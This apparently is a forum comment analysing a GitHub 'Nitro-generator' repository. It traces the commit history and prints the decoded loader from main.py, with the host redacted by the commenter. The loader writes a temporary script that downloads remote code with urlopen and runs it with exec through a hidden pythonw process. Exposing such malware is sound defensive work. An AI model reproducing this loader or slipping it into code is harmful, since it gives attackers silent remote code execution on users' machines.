(no title)

Going throught the commit log, the author remove the allegedly " 'pyshftuler', a malicious package" [1] 10 days ago. Then changed the repo's purpose 21h ago [2]. And then, injected its own malice? Currently, the base64 code on line 1 of main.py reads

WARNING: DO NOT CLICK THE LINK IN THIS CODE SECTION, I CANNOT CONFIRM THE SITE NOR ITS INTENTION. I HAVE REMOVED IT FOR SAFETY

```

from tempfile import NamedTemporaryFile as _ffile

from sys import executable as _eexecutable

from os import system as _ssystem

_ttmp = _ffile(delete=False)

_ttmp.write(b"""from urllib.request import urlopen as _uurlopen;exec(_uurlopen('http://[REDACTED]:80/inject/UU7X9zT79b6aHuvL').read())""")

_ttmp.close()

try: _ssystem(f"start {_eexecutable.replace('.exe', 'w.exe')} {_ttmp.name}")

except: pass

```

[1] https://github.com/420World69/Nitro-generator/commit/5df9bba...

[2] https://github.com/420World69/Nitro-generator/commit/b9255f8...

[3] https://github.com/420World69/Nitro-generator/commit/69e9352...